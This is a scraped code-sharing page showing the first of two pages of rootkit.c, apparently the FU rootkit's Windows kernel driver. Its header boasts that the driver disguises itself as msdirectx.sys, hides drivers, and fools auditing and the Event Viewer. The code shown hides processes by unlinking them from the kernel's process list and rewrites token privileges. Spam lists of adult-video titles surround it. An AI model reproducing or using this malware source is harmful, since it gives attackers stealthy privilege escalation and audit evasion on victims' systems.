亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? rootkit.c

?? rootkit工具
?? C
?? 第 1 頁 / 共 2 頁
字號:
///////////////////////////////////////////////////////////////////////////////////////
// Filename Rootkit.c
// 
// Author: fuzen_op
// Email:  fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: This driver does all the work of fu.exe. The driver is never unloaded 
//              until reboot. You can use whatever methods you like to load the driver 
//				such as SystemLoadAndCallImage suggested by Greg Hoglund. The driver 
//              is named msdirectx.sys. It is a play on Microsoft's DirectX and is named
//              this to help hide it. (A future tool will hide it completely!) The 
//              driver can change the groups and privileges on any process. It can also 
//              hide a process. Another feature is it can impersonate another logon 
//              session so that Windows Auditing etc. does not know what user really 
//              performed the actions you choose to take with the process. It does all 
//              this by Direct Kernel Object Manipulation (TM). No worries about do I have 
//              permission to that process, token, etc. If you can load a driver once, 
//              you are golden! NOW IT HIDES DRIVERS TOO!
//
// Date:    5/27/2003
// Version: 2.0
//
// Date     7/04/2003   Fixed a problem with a modified token not being inheritable.
//		   12/04/2003   Fixed problem with faking out the Windows Event Viewer.	
//						Cleaned up the code a lot! 
//		   12/05/2003   Now the driver walks the PsLoadedModuleList and removes references 
//                      to the device being hidden. Even after the device is hidden, a user 
//						land process can open a handle to it if its symbolic link name still 
//						exists. Obviously, a stealth driver would not want to create a or it 
//						could delete the symbolic link once it has initialized through the use
//						of an IOCTL.	

#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"

#include "Rootkit.h"
#include "ProcessName.h"
#include "ioctlcmd.h"


const WCHAR deviceLinkBuffer[]  = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[]  = L"\\Device\\msdirectx";


//#define DEGUBPRINT
//#ifdef DEBUGPRINT
	#define   DebugPrint		DbgPrint
//#else
//	#define   DebugPrint
//#endif
   
NTSTATUS DriverEntry(
				   IN PDRIVER_OBJECT  DriverObject,
				   IN PUNICODE_STRING RegistryPath
					)
{
	
    NTSTATUS                ntStatus;
    UNICODE_STRING          deviceNameUnicodeString;
    UNICODE_STRING          deviceLinkUnicodeString;        


	// Setup our name and symbolic link. 
    RtlInitUnicodeString (&deviceNameUnicodeString,
                          deviceNameBuffer );
    RtlInitUnicodeString (&deviceLinkUnicodeString,
                          deviceLinkBuffer );
    // Set up the device
    //
    ntStatus = IoCreateDevice ( DriverObject,
                                0, // For driver extension
                                &deviceNameUnicodeString,
                                FILE_DEVICE_ROOTKIT,
                                0,
                                TRUE,
                                &g_RootkitDevice );

    if( NT_SUCCESS(ntStatus)) {
        ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
                                         &deviceNameUnicodeString );


        // Create dispatch points for all routines that must be handled
        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =
        DriverObject->MajorFunction[IRP_MJ_CREATE]          =
        DriverObject->MajorFunction[IRP_MJ_CLOSE]           =
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  = RootkitDispatch;

	    // Its extremely unsafe to unload a system-call hooker.
		// Use GREAT caution.
        DriverObject->DriverUnload                          = RootkitUnload;
    }
    else 
	{
        DebugPrint(("Failed to create device!\n"));
        return ntStatus;
    }

    return STATUS_SUCCESS;
}


NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING          deviceLinkUnicodeString;
	PDEVICE_OBJECT			p_NextObj;

	p_NextObj = DriverObject->DeviceObject;

	if (p_NextObj != NULL)
	{
        // Delete the symbolic link for our device
		//
		RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
		IoDeleteSymbolicLink( &deviceLinkUnicodeString );
		// Delete the device object
		//
		IoDeleteDevice( DriverObject->DeviceObject );
		return STATUS_SUCCESS;
	}
	return STATUS_SUCCESS;
}



NTSTATUS 
RootkitDispatch(
    IN PDEVICE_OBJECT DeviceObject, 
    IN PIRP Irp 
    )
{
    PIO_STACK_LOCATION      irpStack;
    PVOID                   inputBuffer;
    PVOID                   outputBuffer;
    ULONG                   inputBufferLength;
    ULONG                   outputBufferLength;
    ULONG                   ioControlCode;
	NTSTATUS				ntstatus;

    //
    // Go ahead and set the request up as successful
    //
    ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    //
    // Get a pointer to the current location in the Irp. This is where
    //     the function codes and parameters are located.
    //
    irpStack = IoGetCurrentIrpStackLocation (Irp);

    //
    // Get the pointer to the input/output buffer and its length
    //
    inputBuffer             = Irp->AssociatedIrp.SystemBuffer;
    inputBufferLength       = irpStack->Parameters.DeviceIoControl.InputBufferLength;
    outputBuffer            = Irp->AssociatedIrp.SystemBuffer;
    outputBufferLength      = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
    ioControlCode           = irpStack->Parameters.DeviceIoControl.IoControlCode;

    switch (irpStack->MajorFunction) {
    case IRP_MJ_CREATE:
        break;

    case IRP_MJ_SHUTDOWN:
        break;

    case IRP_MJ_CLOSE:
        break;

    case IRP_MJ_DEVICE_CONTROL:

        if(IOCTL_TRANSFER_TYPE(ioControlCode) == METHOD_NEITHER) {
            outputBuffer = Irp->UserBuffer;
        }

        // Its a request from rootkit 
        ntstatus = RootkitDeviceControl(	irpStack->FileObject, TRUE,
												inputBuffer, inputBufferLength, 
												outputBuffer, outputBufferLength,
												ioControlCode, &Irp->IoStatus, DeviceObject );
        break;
    }
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return ntstatus;   
}


NTSTATUS
RootkitDeviceControl(
    IN PFILE_OBJECT FileObject, 
    IN BOOLEAN Wait,
    IN PVOID InputBuffer, 
    IN ULONG InputBufferLength, 
    OUT PVOID OutputBuffer, 
    IN ULONG OutputBufferLength, 
    IN ULONG IoControlCode, 
    OUT PIO_STATUS_BLOCK IoStatus, 
    IN PDEVICE_OBJECT DeviceObject 
    ) 
{
	NTSTATUS ntStatus;
    UNICODE_STRING          deviceLinkUnicodeString;
	MODULE_ENTRY m_current;
	ANSI_STRING ansi_DriverName;
	ANSI_STRING hide_DriverName;
	UNICODE_STRING uni_hide_DriverName;
	int	i_count = 0,   i_numLogs = 0,      find_PID = 0;
	int nluids  = 0, i_PrivCount = 0, i_VariableLen = 0;
	int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
	int i_SidSize = 0, i_spaceNeeded = 0, i_spaceSaved = 0; 
	int i_spaceUsed = 0, sid_count  = 0;
	DWORD eproc      = 0x00000000;
	DWORD start_eproc= 0x00000000;
	DWORD token      = 0x00000000;
	PLIST_ENTRY          plist_active_procs = NULL;
	PLUID_AND_ATTRIBUTES luids_attr = NULL;
	PLUID_AND_ATTRIBUTES luids_attr_orig = NULL;
	PSID_AND_ATTRIBUTES  sid_ptr_old = NULL;

	void *varpart  = NULL, *varbegin = NULL, *psid = NULL;

	DWORD SizeOfOldSids, SizeOfLastSid, d_SidStart;

	IoStatus->Status = STATUS_SUCCESS;
    IoStatus->Information = 0;

    switch ( IoControlCode ) 
	{

	case IOCTL_ROOTKIT_INIT:
		if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
		{
			IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}
		PIDOFFSET       = (int) (*(int *)InputBuffer);
		FLINKOFFSET     = (int) (*((int *)InputBuffer+1));
		AUTHIDOFFSET    = (int) (*((int *)InputBuffer+2));
		TOKENOFFSET     = (int) (*((int *)InputBuffer+3));
		PRIVCOUNTOFFSET = (int) (*((int *)InputBuffer+4));
		PRIVADDROFFSET  = (int) (*((int *)InputBuffer+5));
		SIDCOUNTOFFSET  = (int) (*((int *)InputBuffer+6));
		SIDADDROFFSET   = (int) (*((int *)InputBuffer+7));
		MyPsModuleList  = (PMODULE_ENTRY) (*((PMODULE_ENTRY *)InputBuffer+8));
		// Get the offset of the process name in the EPROCESS structure.
		gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
		if (!gul_ProcessNameOffset)
			return STATUS_UNSUCCESSFUL;

	break;

	case IOCTL_ROOTKIT_HIDEME:
		if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
		{
			IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}

		find_PID = *((DWORD *)InputBuffer);
		if (find_PID == 0x00000000)
		{
			IoStatus->Status = STATUS_INVALID_PARAMETER;
			break;
		}
		
		eproc = FindProcessEPROC(find_PID);
		if (eproc == 0x00000000)
		{
			IoStatus->Status = STATUS_INVALID_PARAMETER;
			break;
		}
		
		plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
		*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
		*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
	
	  break;

	case IOCTL_ROOTKIT_LISTPROC:
		if ((OutputBufferLength < PROCNAMEIDLEN) || (OutputBuffer == NULL))
		{
			IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}
            
		i_numLogs = OutputBufferLength / PROCNAMEIDLEN;
		if (i_numLogs < 1)
		{
			IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}

		find_PID = (DWORD) PsGetCurrentProcessId();
		eproc = FindProcessEPROC(find_PID);

		if (eproc == 0x00000000)
		{
			IoStatus->Status = STATUS_INVALID_PARAMETER;
			break;
		}

		start_eproc = eproc;
		RtlZeroMemory(OutputBuffer, OutputBufferLength);

		for (i_count = 0; i_count < i_numLogs; i_count++)
		{
			_snprintf((char *)((DWORD)OutputBuffer + (i_count * PROCNAMEIDLEN)), PROCNAMEIDLEN-1, "%s:%u",(char *) eproc+gul_ProcessNameOffset, *(DWORD *)(eproc+PIDOFFSET));
			plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
			eproc = (DWORD) plist_active_procs->Flink;
			eproc = eproc - FLINKOFFSET;
			if (start_eproc == eproc)
				break;
		}
		IoStatus->Information = i_count* PROCNAMEIDLEN;
		IoStatus->Status = STATUS_SUCCESS;

		break; 

	case IOCTL_ROOTKIT_SETPRIV:
		if ((InputBufferLength < sizeof(struct _vars)) || (InputBuffer == NULL))
		{
			IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}
		////////////////////////////////////////////////////////////////////////////////////////
		// Some of these are pointers so what they point to may not be paged in, but I don't care. It is 
		// proof of concept code for a reason.
		find_PID = ((VARS *)InputBuffer)->the_PID;
		luids_attr = ((VARS *)InputBuffer)->pluida;
		nluids = ((VARS *)InputBuffer)->num_luids;

		if ((find_PID == 0x00000000) || (luids_attr == NULL) || (nluids == 0))
		{
			IoStatus->Status = STATUS_INVALID_PARAMETER;
			break;
		}
		
		eproc = FindProcessEPROC(find_PID);
		if (eproc == 0x00000000)
		{
			IoStatus->Status = STATUS_INVALID_PARAMETER;
			break;
		}
		
		token = FindProcessToken(eproc);

		i_PrivCount     = *(PDWORD)(token + PRIVCOUNTOFFSET);
		luids_attr_orig = *(PLUID_AND_ATTRIBUTES *)(token + PRIVADDROFFSET);
		//FindTokenParams(token, &i_PrivCount, (PDWORD)&luids_attr_orig);

		// If the new privilege already exists in the token, just change its Attribute field.
		for (luid_attr_count = 0; luid_attr_count < i_PrivCount; luid_attr_count++)
		{
			for (i_LuidsUsed = 0; i_LuidsUsed < nluids; i_LuidsUsed++)
			{
				if((luids_attr[i_LuidsUsed].Attributes != 0xffffffff) && (memcmp(&luids_attr_orig[luid_attr_count].Luid, &luids_attr[i_LuidsUsed].Luid, sizeof(LUID)) == 0))
				{
					luids_attr_orig[luid_attr_count].Attributes = luids_attr[i_LuidsUsed].Attributes;
					luids_attr[i_LuidsUsed].Attributes = 0xffffffff; // Canary value we will use
				}
			}
		}

		// OK, we did not find one of the new Privileges in the set of existing privileges so we are going to find the
		// disabled privileges and overwrite them.

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
91成人免费在线视频| 欧美性大战久久| 欧美在线免费观看视频| 国产亚洲精品7777| 婷婷中文字幕综合| 日韩一区二区中文字幕| 在线欧美小视频| www国产成人免费观看视频 深夜成人网| 一区二区三区在线观看欧美| 欧美日韩一区二区在线视频| 91丝袜国产在线播放| 精品少妇一区二区三区在线视频| 亚洲麻豆国产自偷在线| 粉嫩绯色av一区二区在线观看| 91精品国产91久久久久久最新毛片 | 国产精品免费av| 全部av―极品视觉盛宴亚洲| 91在线观看下载| 国产精品久线观看视频| 国产成人啪午夜精品网站男同| 精品欧美一区二区久久| 日韩二区在线观看| 欧美日韩国产欧美日美国产精品| 亚洲另类色综合网站| 色哟哟欧美精品| 国产精品久久影院| 不卡的电影网站| 亚洲视频在线观看三级| 91美女在线看| 一区二区三区精品视频| 91国产丝袜在线播放| 亚洲女性喷水在线观看一区| 一本一道久久a久久精品 | 色综合久久久久综合体| 亚洲欧美色图小说| 欧亚一区二区三区| 日韩在线a电影| 欧美日韩和欧美的一区二区| 午夜精品一区二区三区三上悠亚| 色老汉av一区二区三区| 亚洲欧美另类久久久精品| jiyouzz国产精品久久| 亚洲人成网站精品片在线观看| av中文一区二区三区| 亚洲精品视频一区| 欧美精品一二三区| 狠狠色狠狠色合久久伊人| 精品国产乱码久久久久久免费| 六月丁香综合在线视频| 久久久91精品国产一区二区精品 | 亚洲女人****多毛耸耸8| 91丝袜呻吟高潮美腿白嫩在线观看| 亚洲精品第1页| 欧美日韩二区三区| 另类专区欧美蜜桃臀第一页| 久久一区二区视频| 不卡的电影网站| 日韩电影在线一区| 国产片一区二区| 欧美性色欧美a在线播放| 久久成人精品无人区| 国产精品国产自产拍高清av| 欧美午夜片在线看| 国内外成人在线视频| 国产精品久线观看视频| 8x8x8国产精品| av在线一区二区| 久久精品国产第一区二区三区| 国产精品免费视频观看| 欧美色综合久久| 粉嫩av一区二区三区粉嫩| 香蕉成人啪国产精品视频综合网| 久久综合av免费| 欧美日韩亚洲综合一区| 国产精品一线二线三线| 亚洲第一福利一区| 国产精品久久久久永久免费观看 | 国内精品免费在线观看| 亚洲乱码中文字幕综合| 国产午夜亚洲精品羞羞网站| 欧美日韩综合一区| 国产91综合网| 老司机午夜精品99久久| 亚洲制服丝袜在线| 国产精品每日更新在线播放网址| 日韩欧美在线123| 在线观看欧美黄色| 99久久婷婷国产综合精品电影| 久久精品国产色蜜蜜麻豆| 亚洲国产aⅴ天堂久久| 国产精品剧情在线亚洲| 久久综合狠狠综合久久综合88| 欧美精品v日韩精品v韩国精品v| 99综合电影在线视频| 国产乱码精品一区二区三| 日韩电影免费一区| 一区二区三区久久| 综合久久国产九一剧情麻豆| 日本一二三不卡| 久久无码av三级| 精品成a人在线观看| 91精品国产一区二区三区蜜臀| 色av成人天堂桃色av| 99久久国产综合精品色伊| 国产91精品免费| 精品亚洲免费视频| 免费观看在线色综合| 日韩激情一二三区| 午夜精品久久久久久久| 五月天欧美精品| 五月综合激情婷婷六月色窝| 亚洲成年人网站在线观看| 亚洲电影在线免费观看| 亚洲成人高清在线| 午夜成人在线视频| 日韩黄色片在线观看| 日韩一区欧美二区| 蜜桃久久久久久| 国内精品久久久久影院色| 国产一区福利在线| 国产精品123| 99久久婷婷国产综合精品| 一本一本久久a久久精品综合麻豆| thepron国产精品| 91精品办公室少妇高潮对白| 日本道色综合久久| 91精品久久久久久久久99蜜臂| 91精品国产一区二区人妖| 精品美女被调教视频大全网站| 久久色.com| 亚洲人成网站精品片在线观看| 亚洲网友自拍偷拍| 麻豆视频观看网址久久| 高清日韩电视剧大全免费| 972aa.com艺术欧美| 欧美性生活大片视频| 欧美一区二区三区喷汁尤物| 26uuu精品一区二区三区四区在线| 国产午夜亚洲精品理论片色戒| 亚洲欧洲成人av每日更新| 亚洲bt欧美bt精品777| 精品一二三四在线| 色先锋资源久久综合| 欧美一二区视频| 国产精品久久看| 免费成人av资源网| 99久久99久久免费精品蜜臀| 制服丝袜成人动漫| 国产丝袜美腿一区二区三区| 一区二区三区四区不卡在线| 美女视频黄 久久| 91一区在线观看| 欧美电视剧免费全集观看| 国产精品电影一区二区| 天堂一区二区在线| 国产91在线看| 日韩欧美国产不卡| 日韩一区日韩二区| 麻豆精品精品国产自在97香蕉| 99久久精品99国产精品| 精品久久免费看| 亚洲成av人片一区二区梦乃| 成人性生交大片免费看中文| 欧美日韩国产天堂| 亚洲欧美日本在线| 国产成人免费xxxxxxxx| 欧美精品丝袜久久久中文字幕| 亚洲天堂av老司机| 国产综合一区二区| 欧美日韩高清一区二区| 亚洲日本电影在线| 成人免费高清视频在线观看| 日韩精品一区二区三区中文不卡 | 国产精品国产三级国产a| 青青草原综合久久大伊人精品优势| 成人小视频在线观看| 日韩精品一区二区三区视频在线观看| 亚洲乱码日产精品bd| 成人高清视频在线| 久久亚洲影视婷婷| 裸体歌舞表演一区二区| 欧美绝品在线观看成人午夜影视| 国产精品理伦片| 国产成人av电影在线播放| 久久综合色天天久久综合图片| 三级欧美在线一区| 欧美电影影音先锋| 性久久久久久久| 欧美日韩精品二区第二页| 亚洲午夜羞羞片| 在线观看成人免费视频| 亚洲欧美乱综合| 91免费精品国自产拍在线不卡| 国产精品免费久久久久| 成人三级在线视频| 成人免费一区二区三区视频| av成人免费在线观看| 日韩美女视频一区| 欧美性受xxxx| 婷婷中文字幕综合|